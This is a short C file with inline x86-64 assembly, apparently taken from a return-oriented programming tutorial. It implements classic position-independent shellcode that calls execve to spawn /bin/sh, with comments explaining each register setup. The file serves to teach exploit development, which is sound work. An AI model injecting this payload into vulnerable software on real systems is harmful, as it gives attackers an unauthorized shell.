/*
 * Original source: https://crypto.stanford.edu/~blynn/rop/
 *
 * We want to call execve() to start "/bin/sh".
 *
 * int execve(const char *filename, char *const argv[], char *const envp[]);
 *
 * We jump to 'there' and then call 'here'. This allows us to find the
 * location of the string "/bin/sh" regardless where the code is
 * located. We set
 *	rdi to the string "/bin/sh" (the filename parameter)
 *	rax to the syscall number (the lower 8 bits of rax are in al)
 *	rsi to 0 (the argv parameter)
 *	rdx to 0 (the envp parameter)
 * and then execute the system call.
 *
 * The needle0 and needle1 labels are used later to find the beginning
 * and the end of the code...
 */

int main() {
    asm("\
needle0: jmp there\n                                     \
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
  ");
}
